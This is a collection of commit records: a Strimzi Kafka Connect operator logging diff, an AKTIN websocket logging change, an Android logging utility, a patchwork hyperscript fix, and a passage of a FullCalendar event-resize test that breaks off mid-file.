connectorOperator.listAsync(namespace, Optional.of(new LabelSelectorBuilder().addToMatchLabels(Labels.STRIMZI_CLUSTER_LABEL, connectName).build())) ).compose(cf -> { List<String> runningConnectorNames = cf.resultAt(0); List<KafkaConnector> desiredConnectors = cf.resultAt(1); log.debug("{}: {}} cluster: required connectors: {}", reconciliation, kind(), desiredConnectors); Set<String> deleteConnectorNames = new HashSet<>(runningConnectorNames); deleteConnectorNames.removeAll(desiredConnectors.stream().map(c -> c.getMetadata().getName()).collect(Collectors.toSet())); log.debug("{}: {}} cluster: delete connectors: {}", reconciliation, kind(), deleteConnectorNames); Stream<Future<Void>> deletionFutures = deleteConnectorNames.stream().map(connectorName -> reconcileConnector(reconciliation, host, apiClient, useResources, connectorName, null) ); Stream<Future<Void>> createUpdateFutures = desiredConnectors.stream() .map(connector -> reconcileConnector(reconciliation, host, apiClient, useResources, connector.getMetadata().getName(), connector)); return CompositeFuture.join(Stream.concat(deletionFutures, createUpdateFutures).collect(Collectors.toList())).map((Void) null); }); } private Future<Void> reconcileConnector(Reconciliation reconciliation, String host, KafkaConnectApi apiClient, boolean useResources, String connectorName, KafkaConnector connector) { if (connector == null) { if (useResources) { log.debug("{}: {}} cluster: deleting connector: {}", reconciliation, kind(), connectorName); return apiClient.delete(host, KafkaConnectCluster.REST_API_PORT, connectorName); } else { return Future.succeededFuture(); } } else { log.debug("{}: {}} cluster: creating/updating connector: {}", reconciliation, kind(), connectorName); if (connector.getSpec() == null) { return maybeUpdateConnectorStatus(reconciliation, connector, null, new InvalidResourceException("spec property is required")); } if (!useResources) { return maybeUpdateConnectorStatus(reconciliation, connector, null, new NoSuchResourceException(reconciliation.kind() + " " + reconciliation.name() + " is not configured with annotation " + STRIMZI_IO_USE_CONNECTOR_RESOURCES)); } else { Promise<Void> promise = Promise.promise(); apiClient.createOrUpdatePutRequest(host, KafkaConnectCluster.REST_API_PORT, connectorName, asJson(connector.getSpec())) .compose(ignored -> apiClient.statusWithBackOff(new BackOff(200L, 2, 6), host, KafkaConnectCluster.REST_API_PORT, connectorName)) .compose(status -> { Object path = ((Map) status.getOrDefault("connector", emptyMap())).get("state"); if (!(path instanceof String)) { return Future.failedFuture("JSON response lacked $.connector.state"); } else { String state = (String) path; boolean shouldPause = Boolean.TRUE.equals(connector.getSpec().getPause()); if ("RUNNING".equals(state) && shouldPause) { log.debug("{}: Pausing connector {}", reconciliation, connectorName); return apiClient.pause(host, KafkaConnectCluster.REST_API_PORT, connectorName) .compose(ignored -> apiClient.status(host, KafkaConnectCluster.REST_API_PORT, connectorName)); } else if ("PAUSED".equals(state) && !shouldPause) { log.debug("{}: Resuming connector {}", reconciliation, connectorName); return apiClient.resume(host, KafkaConnectCluster.REST_API_PORT, connectorName) .compose(ignored -> apiClient.status(host, KafkaConnectCluster.REST_API_PORT, connectorName)); } else { return Future.succeededFuture(status); } } }) .setHandler(result -> { if (result.succeeded()) { maybeUpdateConnectorStatus(reconciliation, connector, result.result(), null); } else { maybeUpdateConnectorStatus(reconciliation, connector, result.result(), result.cause()); } promise.complete(); }); return promise.future(); } } } public static void updateStatus(Throwable error, KafkaConnector kafkaConnector2, CrdOperator<?, KafkaConnector, ?, ?> connectorOperations) { KafkaConnectorStatus status = new KafkaConnectorStatus(); StatusUtils.setStatusConditionAndObservedGeneration(kafkaConnector2, status, error); StatusDiff diff = new StatusDiff(kafkaConnector2.getStatus(), status); if (!diff.isEmpty()) { KafkaConnector copy = new KafkaConnectorBuilder(kafkaConnector2).build(); copy.setStatus(status); connectorOperations.updateStatusAsync(copy); } } Future<Void> maybeUpdateConnectorStatus(Reconciliation reconciliation, KafkaConnector connector, Map<String, Object> statusResult, Throwable error) { KafkaConnectorStatus status = new KafkaConnectorStatus(); if (error != null) { log.warn("{}: Error reconciling connector {}", reconciliation, connector.getMetadata().getName(), error); } StatusUtils.setStatusConditionAndObservedGeneration(connector, status, error != null ? Future.failedFuture(error) : Future.succeededFuture()); status.setConnectorStatus(statusResult); return maybeUpdateStatusCommon(connectorOperator, connector, reconciliation, status, (connector1, status1) -> { return new KafkaConnectorBuilder(connector1).withStatus(status1).build(); }); } private JsonObject asJson(KafkaConnectorSpec spec) { JsonObject connectorConfigJson = new JsonObject(); if (spec.getConfig() != null) { for (Map.Entry<String, Object> cf : spec.getConfig().entrySet()) { String name = cf.getKey(); if ("connector.class".equals(name) || "tasks.max".equals(name)) { // TODO include resource namespace and name in this message log.warn("Configuration parameter {} in KafkaConnector.spec.config will be ignored and the value from KafkaConnector.spec will be used instead", name); } connectorConfigJson.put(name, cf.getValue()); } } return connectorConfigJson .put("connector.class", spec.getClassName()) .put("tasks.max", spec.getTasksMax()); } /** * Updates the Status field of the KafkaConnect or KafkaConnector CR. It diffs the desired status against the current status and calls * the update only when there is any difference in non-timestamp fields. * * @param resource The CR of KafkaConnect or KafkaConnector * @param reconciliation Reconciliation information * @param desiredStatus The KafkaConnectStatus or KafkaConnectorStatus which should be set * * @return */ protected <T extends CustomResource & HasStatus<S>, S extends Status, L extends CustomResourceList<T>, D extends Doneable<T>> Future<Void> maybeUpdateStatusCommon(CrdOperator<KubernetesClient, T, L, D> resourceOperator, T resource, Reconciliation reconciliation, S desiredStatus, BiFunction<T, S, T> copyWithStatus) { Promise<Void> updateStatusPromise = Promise.promise(); resourceOperator.getAsync(resource.getMetadata().getNamespace(), resource.getMetadata().getName()).setHandler(getRes -> { if (getRes.succeeded()) { T fetchedResource = getRes.result(); if (fetchedResource != null) { if ((!(fetchedResource instanceof KafkaConnector)) && StatusUtils.isResourceV1alpha1(fetchedResource)) { log.warn("{}: {} {} needs to be upgraded from version {} to 'v1beta1' to use the status field", reconciliation, fetchedResource.getKind(), fetchedResource.getMetadata().getName(), fetchedResource.getApiVersion()); updateStatusPromise.complete(); } else { S currentStatus = fetchedResource.getStatus(); StatusDiff ksDiff = new StatusDiff(currentStatus, desiredStatus); if (!ksDiff.isEmpty()) { T resourceWithNewStatus = copyWithStatus.apply(fetchedResource, desiredStatus); resourceOperator.updateStatusAsync(resourceWithNewStatus).setHandler(updateRes -> { if (updateRes.succeeded()) { log.debug("{}: Completed status update", reconciliation); updateStatusPromise.complete(); } else { log.error("{}: Failed to update status", reconciliation, updateRes.cause()); updateStatusPromise.fail(updateRes.cause()); } }); } else { log.debug("{}: Status did not change", reconciliation); updateStatusPromise.complete(); } } } else { log.error("{}: Current {} resource not found", reconciliation, resource.getKind()); updateStatusPromise.fail("Current " + resource.getKind() + " resource not found"); } } else { log.error("{}: Failed to get the current {} resource and its status", reconciliation, resource.getKind(), getRes.cause()); updateStatusPromise.fail(getRes.cause()); } }); return updateStatusPromise.future(); } }
Improve logging of the connector operator (#2419) Signed-off-by: Jakub Scholz <[email protected]>
cluster-operator/src/main/java/io/strimzi/operator/cluster/operator/assembly/AbstractConnectOperator.java
Improve logging of the connector operator (#2419)
<ide><path>luster-operator/src/main/java/io/strimzi/operator/cluster/operator/assembly/AbstractConnectOperator.java <ide> connectOperator.connectorOperator.watch(watchNamespaceOrWildcard, new Watcher<KafkaConnector>() { <ide> @Override <ide> public void eventReceived(Action action, KafkaConnector kafkaConnector) { <add> String connectorName = kafkaConnector.getMetadata().getName(); <add> String connectorNamespace = kafkaConnector.getMetadata().getNamespace(); <add> String connectorKind = kafkaConnector.getKind(); <ide> String connectName = kafkaConnector.getMetadata().getLabels() == null ? null : kafkaConnector.getMetadata().getLabels().get(Labels.STRIMZI_CLUSTER_LABEL); <del> String connectorNamespace = kafkaConnector.getMetadata().getNamespace(); <ide> String connectNamespace = connectorNamespace; <del> Future<Void> f; <del> if (connectName != null) { <del> // Check whether a KafkaConnect/S2I exists <del> CompositeFuture.join(connectOperator.resourceOperator.getAsync(connectNamespace, connectName), <del> connectOperator.pfa.supportsS2I() ? <del> connectS2IOperator.resourceOperator.getAsync(connectNamespace, connectName) : <del> Future.succeededFuture()) <del> .compose(cf -> { <del> KafkaConnect connect = cf.resultAt(0); <del> KafkaConnectS2I connectS2i = cf.resultAt(1); <del> KafkaConnectApi apiClient = connectOperator.connectClientProvider.apply(connectOperator.vertx); <del> if (connect == null && connectS2i == null) { <del> updateStatus(noConnectCluster(connectNamespace, connectName), kafkaConnector, connectOperator.connectorOperator); <del> return Future.succeededFuture(); <del> } else if (connect != null) { <del> // grab the lock and call reconcileConnectors() <del> // (i.e. short circuit doing a whole KafkaConnect reconciliation). <del> Reconciliation reconciliation = new Reconciliation("connector-watch", connectOperator.kind(), <del> kafkaConnector.getMetadata().getNamespace(), connectName); <del> if (connectS2i != null) { <del> log.warn("{}: There is both a KafkaConnect resource and a KafkaConnectS2I resource named {}. " + <del> "The KafkaConnect takes precedence for the connector {}", <del> reconciliation, connectName, connect.getMetadata().getName()); <del> } <del> return connectOperator.withLock(reconciliation, LOCK_TIMEOUT_MS, <del> () -> connectOperator.reconcileConnector(reconciliation, <del> KafkaConnectResources.serviceName(connectName), apiClient, <del> isUseResources(connect), <del> kafkaConnector.getMetadata().getName(), action == Action.DELETED ? null : kafkaConnector)); <del> } else { <del> // grab the lock and call reconcileConnectors() <del> // (i.e. short circuit doing a whole KafkaConnect reconciliation). <del> Reconciliation r = new Reconciliation("connector-watch", connectS2IOperator.kind(), <del> kafkaConnector.getMetadata().getNamespace(), connectName); <del> return connectS2IOperator.withLock(r, LOCK_TIMEOUT_MS, <del> () -> connectS2IOperator.reconcileConnector(r, <del> KafkaConnectResources.serviceName(connectName), apiClient, <del> isUseResources(connectS2i), <del> kafkaConnector.getMetadata().getName(), action == Action.DELETED ? null : kafkaConnector)); <del> } <del> } <del> ); <del> } else { <del> updateStatus(new InvalidResourceException("Resource lacks label '" <del> + Labels.STRIMZI_CLUSTER_LABEL <del> + "': No connect cluster in which to create this connector."), <del> kafkaConnector, connectOperator.connectorOperator); <add> <add> switch (action) { <add> case ADDED: <add> case DELETED: <add> case MODIFIED: <add> Future<Void> f; <add> if (connectName != null) { <add> // Check whether a KafkaConnect/S2I exists <add> CompositeFuture.join(connectOperator.resourceOperator.getAsync(connectNamespace, connectName), <add> connectOperator.pfa.supportsS2I() ? <add> connectS2IOperator.resourceOperator.getAsync(connectNamespace, connectName) : <add> Future.succeededFuture()) <add> .compose(cf -> { <add> KafkaConnect connect = cf.resultAt(0); <add> KafkaConnectS2I connectS2i = cf.resultAt(1); <add> KafkaConnectApi apiClient = connectOperator.connectClientProvider.apply(connectOperator.vertx); <add> if (connect == null && connectS2i == null) { <add> log.info("{} {} in namespace {} was {}, but Connect cluster {} does not exist", connectorKind, connectorName, connectorNamespace, action, connectName); <add> updateStatus(noConnectCluster(connectNamespace, connectName), kafkaConnector, connectOperator.connectorOperator); <add> return Future.succeededFuture(); <add> } else if (connect != null) { <add> // grab the lock and call reconcileConnectors() <add> // (i.e. short circuit doing a whole KafkaConnect reconciliation). <add> Reconciliation reconciliation = new Reconciliation("connector-watch", connectOperator.kind(), <add> kafkaConnector.getMetadata().getNamespace(), connectName); <add> log.info("{}: {} {} in namespace {} was {}", reconciliation, connectorKind, connectorName, connectorNamespace, action); <add> <add> if (connectS2i != null) { <add> log.warn("{}: There is both a KafkaConnect resource and a KafkaConnectS2I resource named {}. " + <add> "The KafkaConnect takes precedence for the connector {}", <add> reconciliation, connectName, connect.getMetadata().getName()); <add> } <add> return connectOperator.withLock(reconciliation, LOCK_TIMEOUT_MS, <add> () -> connectOperator.reconcileConnector(reconciliation, <add> KafkaConnectResources.serviceName(connectName), apiClient, <add> isUseResources(connect), <add> kafkaConnector.getMetadata().getName(), action == Action.DELETED ? null : kafkaConnector) <add> .compose(reconcileResult -> { <add> log.info("{}: reconciled", reconciliation); <add> return Future.succeededFuture(reconcileResult); <add> })); <add> } else { <add> // grab the lock and call reconcileConnectors() <add> // (i.e. short circuit doing a whole KafkaConnect reconciliation). <add> Reconciliation reconciliation = new Reconciliation("connector-watch", connectS2IOperator.kind(), <add> kafkaConnector.getMetadata().getNamespace(), connectName); <add> log.info("{}: {} {} in namespace {} was {}", reconciliation, connectorKind, connectorName, connectorNamespace, action); <add> <add> return connectS2IOperator.withLock(reconciliation, LOCK_TIMEOUT_MS, <add> () -> connectS2IOperator.reconcileConnector(reconciliation, <add> KafkaConnectResources.serviceName(connectName), apiClient, <add> isUseResources(connectS2i), <add> kafkaConnector.getMetadata().getName(), action == Action.DELETED ? null : kafkaConnector) <add> .compose(reconcileResult -> { <add> log.info("{}: reconciled", reconciliation); <add> return Future.succeededFuture(reconcileResult); <add> })); <add> } <add> }); <add> } else { <add> updateStatus(new InvalidResourceException("Resource lacks label '" <add> + Labels.STRIMZI_CLUSTER_LABEL <add> + "': No connect cluster in which to create this connector."), <add> kafkaConnector, connectOperator.connectorOperator); <add> } <add> <add> break; <add> case ERROR: <add> log.error("Failed {} {} in namespace {} ", connectorKind, connectorName, connectorNamespace); <add> break; <add> default: <add> log.error("Unknown action: {} {} in namespace {}", connectorKind, connectorName, connectorNamespace); <ide> } <ide> } <ide> <ide> ).compose(cf -> { <ide> List<String> runningConnectorNames = cf.resultAt(0); <ide> List<KafkaConnector> desiredConnectors = cf.resultAt(1); <del> log.debug("{}: {}} cluster: required connectors: {}", reconciliation, kind(), desiredConnectors); <add> log.debug("{}: {} cluster: required connectors: {}", reconciliation, kind(), desiredConnectors); <ide> Set<String> deleteConnectorNames = new HashSet<>(runningConnectorNames); <ide> deleteConnectorNames.removeAll(desiredConnectors.stream().map(c -> c.getMetadata().getName()).collect(Collectors.toSet())); <del> log.debug("{}: {}} cluster: delete connectors: {}", reconciliation, kind(), deleteConnectorNames); <add> log.debug("{}: {} cluster: delete connectors: {}", reconciliation, kind(), deleteConnectorNames); <ide> Stream<Future<Void>> deletionFutures = deleteConnectorNames.stream().map(connectorName -> <ide> reconcileConnector(reconciliation, host, apiClient, useResources, connectorName, null) <ide> ); <ide> private Future<Void> reconcileConnector(Reconciliation reconciliation, String host, KafkaConnectApi apiClient, boolean useResources, String connectorName, KafkaConnector connector) { <ide> if (connector == null) { <ide> if (useResources) { <del> log.debug("{}: {}} cluster: deleting connector: {}", reconciliation, kind(), connectorName); <add> log.info("{}: deleting connector: {}", reconciliation, connectorName); <ide> return apiClient.delete(host, KafkaConnectCluster.REST_API_PORT, connectorName); <ide> } else { <ide> return Future.succeededFuture(); <ide> } <ide> } else { <del> log.debug("{}: {}} cluster: creating/updating connector: {}", reconciliation, kind(), connectorName); <add> log.info("{}: creating/updating connector: {}", reconciliation, connectorName); <ide> if (connector.getSpec() == null) { <ide> return maybeUpdateConnectorStatus(reconciliation, connector, null, <ide> new InvalidResourceException("spec property is required"));
Java
apache-2.0
5f6f1ee5e47fee02a9983599bab92854102fd59c
0
aktin/broker,aktin/broker,aktin/broker,aktin/broker
package org.aktin.broker.websocket; import java.io.IOException; import java.util.Objects; import java.util.Set; import java.util.function.Predicate; import java.util.logging.Level; import javax.websocket.OnClose; import javax.websocket.OnError; import javax.websocket.OnMessage; import javax.websocket.OnOpen; import javax.websocket.Session; import org.aktin.broker.auth.Principal; import lombok.extern.java.Log; @Log public abstract class AbstractBroadcastWebsocket { protected abstract boolean isAuthorized(Principal principal); protected abstract void addSession(Session session, Principal user); protected abstract void removeSession(Session session, Principal user); @OnOpen public void open(Session session){ Principal user = getSessionPrincipal(session); log.log(Level.INFO, "Websocket session {0} created for user {1}", new Object[] {session.getId(), user}); // check privileges and close session if needed if( isAuthorized(user) ) { addSession(session, user); }else { // unauthorized, close session try { session.close(); return; } catch (IOException e) { log.log(Level.WARNING,"Failed to close session", e); } } // send welcome message try { session.getBasicRemote().sendText("welcome "+user.getName()); } catch (IOException e) { log.log(Level.WARNING,"Unable to send welcome message", e); } } @OnClose public void close(Session session){ Principal user = getSessionPrincipal(session); removeSession(session); log.info("Websocket session {0} closed for user {1} ",new Object[] {session.getId(), user}); } @OnMessage public void message(Session session, String message){ Principal user = getSessionPrincipal(session); if( message.startsWith("ping ") ) { // TODO send pong and handle in client }else { log.log(Level.INFO, "Ignoring message from client {0}",user.getName()); } } @OnError public void error(Session session, Throwable t) { Principal user = getSessionPrincipal(session); log.log(Level.INFO, "Websocket session {0} error for user {1}: {2}", new Object[] {session.getId(), user, t}); } static int broadcast(Set<Session> clients, String message){ // if no filter is supplied, broadcast to all nodes return broadcast(clients, message, p -> true); } static int broadcast(Set<Session> clients, String message, Predicate<Principal> principalFilter){ Objects.requireNonNull(principalFilter); if( clients.isEmpty() ){ return 0; } int count = 0; // loop through connected clients for( Session session : clients ){ Principal user = getSessionPrincipal(session); if( user == null ) { log.log(Level.WARNING,"Skipping websocket session {0} without authentication",session.getId()); continue; } if( principalFilter.test(user) == false ) { // skip filtered continue; } if( session.isOpen() ){ session.getAsyncRemote().sendText(message); count ++; } } return count; } /** * Get authentication info for a given websocket session * @param session session * @return principal */ protected static Principal getSessionPrincipal(Session session) { return (Principal)session.getUserProperties().get(HeaderAuthSessionConfigurator.AUTH_USER); } }
broker-server/src/main/java/org/aktin/broker/websocket/AbstractBroadcastWebsocket.java
package org.aktin.broker.websocket; import java.io.IOException; import java.util.Objects; import java.util.Set; import java.util.function.Predicate; import java.util.logging.Level; import javax.websocket.OnClose; import javax.websocket.OnError; import javax.websocket.OnMessage; import javax.websocket.OnOpen; import javax.websocket.Session; import org.aktin.broker.auth.Principal; import lombok.extern.java.Log; @Log public abstract class AbstractBroadcastWebsocket { protected abstract boolean isAuthorized(Principal principal); protected abstract void addSession(Session session, Principal user); protected abstract void removeSession(Session session, Principal user); @OnOpen public void open(Session session){ Principal user = getSessionPrincipal(session); log.log(Level.INFO, "Websocket session {0} created for user {1}", new Object[] {session.getId(), user}); // check privileges and close session if needed if( isAuthorized(user) ) { addSession(session, user); }else { // unauthorized, close session try { session.close(); return; } catch (IOException e) { log.log(Level.WARNING,"Failed to close session", e); } } // send welcome message try { session.getBasicRemote().sendText("welcome "+user.getName()); } catch (IOException e) { log.log(Level.WARNING,"Unable to send welcome message", e); } } @OnClose public void close(Session session){ removeSession(session, getSessionPrincipal(session)); log.info("Websocket session closed: "+session.getId()); } @OnMessage public void message(Session session, String message){ Principal user = getSessionPrincipal(session); log.log(Level.INFO, "Ignoring message from client {0}",user.getName()); } @OnError public void error(Session session, Throwable t) { log.log(Level.INFO, "Websocket error reported for session {0}: {1}", new Object[] {session.getId(), t}); } static int broadcast(Set<Session> clients, String message){ // if no filter is supplied, broadcast to all nodes return broadcast(clients, message, p -> true); } static int broadcast(Set<Session> clients, String message, Predicate<Principal> principalFilter){ Objects.requireNonNull(principalFilter); if( clients.isEmpty() ){ return 0; } int count = 0; // loop through connected clients for( Session session : clients ){ Principal user = getSessionPrincipal(session); if( user == null ) { log.log(Level.WARNING,"Skipping websocket session {0} without authentication",session.getId()); continue; } if( principalFilter.test(user) == false ) { // skip filtered continue; } if( session.isOpen() ){ session.getAsyncRemote().sendText(message); count ++; } } return count; } /** * Get authentication info for a given websocket session * @param session session * @return principal */ protected static Principal getSessionPrincipal(Session session) { return (Principal)session.getUserProperties().get(HeaderAuthSessionConfigurator.AUTH_USER); } }
also log username during websocket session close and errors. ignore "ping .*" message from websocket client.
broker-server/src/main/java/org/aktin/broker/websocket/AbstractBroadcastWebsocket.java
also log username during websocket session close and errors. ignore "ping .*" message from websocket client.
<ide><path>roker-server/src/main/java/org/aktin/broker/websocket/AbstractBroadcastWebsocket.java <ide> } <ide> @OnClose <ide> public void close(Session session){ <del> removeSession(session, getSessionPrincipal(session)); <del> log.info("Websocket session closed: "+session.getId()); <add> Principal user = getSessionPrincipal(session); <add> removeSession(session); <add> log.info("Websocket session {0} closed for user {1} ",new Object[] {session.getId(), user}); <ide> } <ide> <ide> @OnMessage <ide> public void message(Session session, String message){ <ide> Principal user = getSessionPrincipal(session); <del> log.log(Level.INFO, "Ignoring message from client {0}",user.getName()); <add> if( message.startsWith("ping ") ) { <add> // TODO send pong and handle in client <add> }else { <add> log.log(Level.INFO, "Ignoring message from client {0}",user.getName()); <add> } <ide> } <ide> @OnError <ide> public void error(Session session, Throwable t) { <del> log.log(Level.INFO, "Websocket error reported for session {0}: {1}", new Object[] {session.getId(), t}); <add> Principal user = getSessionPrincipal(session); <add> log.log(Level.INFO, "Websocket session {0} error for user {1}: {2}", new Object[] {session.getId(), user, t}); <ide> } <ide> <ide> static int broadcast(Set<Session> clients, String message){
Java
apache-2.0
error: pathspec 'code/Logger.java' did not match any file(s) known to git
084b7d2b3f53410d3aa3f11a99bc8a0216cf8ac3
1
scijoker/logger
package com.onebit.logger; import android.os.Build; import android.util.Log; import org.json.JSONArray; import org.json.JSONException; import org.json.JSONObject; /** * Created by scijoker on 08.10.15. */ public class Logger { public static void d(String tag, String arg) { Log.d(tag, arg); } public static void dd(String tag, Object source) { if (isJSONValid(source)) { try { format(tag, new JSONObject(source.toString()).toString(2)); } catch (JSONException e) { e.printStackTrace(); } } else { format(tag, source); } } private static void format(String tag, Object source) { tag = " " + tag + " "; d(" ", " "); d(" ", getSplitter(50) + tag + getSplitter(50)); d(" ", "" + source); d(" ", getSplitter(100 + tag.length())); d(" ", " "); } private static String getSplitter(int length) { StringBuilder builder = new StringBuilder(); for (int i = 0; i < length; i++) { builder.append("-"); } return builder.toString(); } private static boolean isJSONValid(Object test) { try { new JSONObject(test.toString()); } catch (JSONException ex) { try { if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) { new JSONArray(test); } } catch (JSONException ex1) { return false; } } return true; } }
code/Logger.java
Create Logger.java
code/Logger.java
Create Logger.java
<ide><path>ode/Logger.java <add>package com.onebit.logger; <add> <add>import android.os.Build; <add>import android.util.Log; <add> <add>import org.json.JSONArray; <add>import org.json.JSONException; <add>import org.json.JSONObject; <add> <add>/** <add> * Created by scijoker on 08.10.15. <add> */ <add>public class Logger { <add> <add> public static void d(String tag, String arg) { <add> Log.d(tag, arg); <add> } <add> <add> public static void dd(String tag, Object source) { <add> if (isJSONValid(source)) { <add> try { <add> format(tag, new JSONObject(source.toString()).toString(2)); <add> } catch (JSONException e) { <add> e.printStackTrace(); <add> } <add> } else { <add> format(tag, source); <add> } <add> } <add> <add> private static void format(String tag, Object source) { <add> tag = " " + tag + " "; <add> d(" ", " "); <add> d(" ", getSplitter(50) + tag + getSplitter(50)); <add> d(" ", "" + source); <add> d(" ", getSplitter(100 + tag.length())); <add> d(" ", " "); <add> } <add> <add> private static String getSplitter(int length) { <add> StringBuilder builder = new StringBuilder(); <add> for (int i = 0; i < length; i++) { <add> builder.append("-"); <add> } <add> return builder.toString(); <add> } <add> <add> private static boolean isJSONValid(Object test) { <add> try { <add> new JSONObject(test.toString()); <add> } catch (JSONException ex) { <add> try { <add> if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) { <add> new JSONArray(test); <add> } <add> } catch (JSONException ex1) { <add> return false; <add> } <add> } <add> return true; <add> } <add>}
JavaScript
agpl-3.0
736ceaf8051d00d3abbe6e40c16901c0e9ef420c
0
ssbc/patchwork,ssbc/patchwork
var h = require('../lib/h') var plugs = require('patchbay/plugs') var message_content = plugs.first(exports.message_content = []) var message_content_mini = plugs.first(exports.message_content_mini = []) var message_link = plugs.first(exports.message_link = []) var avatar_image = plugs.first(exports.avatar_image = []) var avatar_name = plugs.first(exports.avatar_name = []) var avatar_link = plugs.first(exports.avatar_link = []) var message_meta = plugs.map(exports.message_meta = []) var message_main_meta = plugs.map(exports.message_main_meta = []) var message_action = plugs.map(exports.message_action = []) var contextMenu = require('../lib/context-menu') exports.message_render = function (msg, inContext) { var elMini = message_content_mini(msg) if (elMini) { var div = h('Message', { 'ev-contextmenu': contextMenu.bind(null, msg) }, [ h('header', [ h('div', [ avatar_link(msg.value.author, avatar_name(msg.value.author), ''), ' ', elMini ]), h('div.message_meta.row', [message_meta(msg)]) ]) ]) div.setAttribute('tabindex', '0') return div } var el = message_content(msg) if (!el) return var classList = [] var replyInfo = null if (msg.value.content.root) { classList.push('-reply') if (!inContext) { replyInfo = h('span', ['in reply to ', message_link(msg.value.content.root)]) } } var element = h('Message', { classList, 'ev-contextmenu': contextMenu.bind(null, msg), 'ev-keydown': function (ev) { // on enter, hit first meta. if (ev.keyCode === 13) { element.querySelector('.enter').click() } } }, [ h('header', [ h('div.main', [ h('a.avatar', {href: `#${msg.value.author}`}, avatar_image(msg.value.author)), h('div.main', [ h('div.name', [ h('a', {href: `#${msg.value.author}`}, avatar_name(msg.value.author)) ]), h('div.meta', [ message_main_meta(msg), ' ', replyInfo ]) ]) ]), h('div.meta', message_meta(msg)) ]), h('section', [el]), h('footer', [ h('div.actions', [ message_action(msg), h('a', {href: '#' + msg.key}, 'Reply') ]) ]) ]) // ); hyperscript does not seem to set attributes correctly. element.setAttribute('tabindex', '0') return element }
modules/message.js
var h = require('../lib/h') var plugs = require('patchbay/plugs') var message_content = plugs.first(exports.message_content = []) var message_content_mini = plugs.first(exports.message_content_mini = []) var message_link = plugs.first(exports.message_link = []) var avatar_image = plugs.first(exports.avatar_image = []) var avatar_name = plugs.first(exports.avatar_name = []) var avatar_link = plugs.first(exports.avatar_link = []) var message_meta = plugs.map(exports.message_meta = []) var message_main_meta = plugs.map(exports.message_main_meta = []) var message_action = plugs.map(exports.message_action = []) var contextMenu = require('../lib/context-menu') exports.message_render = function (msg, inContext) { var elMini = message_content_mini(msg) if (elMini) { var div = h('Message', { 'ev-contextmenu': contextMenu.bind(null, msg) }, [ h('header', [ h('div', [ avatar_link(msg.value.author, avatar_name(msg.value.author), ''), ' ', elMini ]), h('div.message_meta.row', message_meta(msg)) ]) ]) div.setAttribute('tabindex', '0') return div } var el = message_content(msg) if (!el) return var classList = [] var replyInfo = null if (msg.value.content.root) { classList.push('-reply') if (!inContext) { replyInfo = h('span', ['in reply to ', message_link(msg.value.content.root)]) } } var element = h('Message', { classList, 'ev-contextmenu': contextMenu.bind(null, msg), 'ev-keydown': function (ev) { // on enter, hit first meta. if (ev.keyCode === 13) { element.querySelector('.enter').click() } } }, [ h('header', [ h('div.main', [ h('a.avatar', {href: `#${msg.value.author}`}, avatar_image(msg.value.author)), h('div.main', [ h('div.name', [ h('a', {href: `#${msg.value.author}`}, avatar_name(msg.value.author)) ]), h('div.meta', [ message_main_meta(msg), ' ', replyInfo ]) ]) ]), h('div.meta', message_meta(msg)) ]), h('section', [el]), h('footer', [ h('div.actions', [ message_action(msg), h('a', {href: '#' + msg.key}, 'Reply') ]) ]) ]) // ); hyperscript does not seem to set attributes correctly. element.setAttribute('tabindex', '0') return element }
message: fix a hyperscript typo
modules/message.js
message: fix a hyperscript typo
<ide><path>odules/message.js <ide> avatar_link(msg.value.author, avatar_name(msg.value.author), ''), <ide> ' ', elMini <ide> ]), <del> h('div.message_meta.row', message_meta(msg)) <add> h('div.message_meta.row', [message_meta(msg)]) <ide> ]) <ide> ]) <ide> div.setAttribute('tabindex', '0')
JavaScript
mit
34d945eb463a7a2d3509636d597f3410ef1ffc0f
0
oleg-babintsev/fullcalendar,MeteorAdminz/fullcalendar,fullcalendar/fullcalendar,MeteorAdminz/fullcalendar,deepskyr/fullcalendar,deepskyr/fullcalendar,MeteorAdminz/fullcalendar,avanti-technologies/fullcalendar,kleisauke/fullcalendar,rgnevashev/fullcalendar,deepskyr/fullcalendar,fullcalendar/fullcalendar,fullcalendar/fullcalendar,rgnevashev/fullcalendar,pietervisser/fullcalendar,blubberly/fullcalendar,rgnevashev/fullcalendar,MeteorAdminz/fullcalendar,pietervisser/fullcalendar,rgnevashev/fullcalendar,avanti-technologies/fullcalendar,pietervisser/fullcalendar,kleisauke/fullcalendar,avanti-technologies/fullcalendar,fullcalendar/fullcalendar,laoneo/fullcalendar,oleg-babintsev/fullcalendar,avanti-technologies/fullcalendar,oleg-babintsev/fullcalendar,arshaw/fullcalendar,deepskyr/fullcalendar,arshaw/fullcalendar,arshaw/fullcalendar,arshaw/fullcalendar,laoneo/fullcalendar,blubberly/fullcalendar,laoneo/fullcalendar,kleisauke/fullcalendar,blubberly/fullcalendar,blubberly/fullcalendar,kleisauke/fullcalendar
describe('eventResize', function() { var options; beforeEach(function() { options = { defaultDate: '2014-06-11', editable: true }; affix('#cal'); }); afterEach(function() { $('#cal').fullCalendar('destroy'); }); describe('when in month view', function() { beforeEach(function() { options.defaultView = 'month'; }); describe('when resizing an all-day event with mouse', function() { it('should have correct arguments with a whole-day delta', function(done) { options.events = [ { title: 'all-day event', start: '2014-06-11', allDay: true } ]; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('.fc-day').width() * -2.5, // guarantee 2 days to left dy: $('.fc-day').height() }); }, function(event, delta, revertFunc) { expect(delta.asDays()).toBe(5); expect(delta.hours()).toBe(0); expect(delta.minutes()).toBe(0); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toEqualMoment('2014-06-17'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toBeNull(); done(); } ); }); }); describe('when resizing an all-day event via touch', function() { it('should have correct arguments with a whole-day delta', function(done) { options.isTouch = true; options.longPressDelay = 100; options.dragRevertDuration = 0; // so that eventDragStop happens immediately after touchend options.events = [ { title: 'all-day event', start: '2014-06-11', allDay: true } ]; init( function() { $('.fc-event').simulate('drag', { isTouch: true, delay: 200, onRelease: function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('.fc-day').width() * -2.5, // guarantee 2 days to left dy: $('.fc-day').height(), isTouch: true }); } }); }, function(event, delta, revertFunc) { expect(delta.asDays()).toBe(5); expect(delta.hours()).toBe(0); expect(delta.minutes()).toBe(0); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toEqualMoment('2014-06-17'); 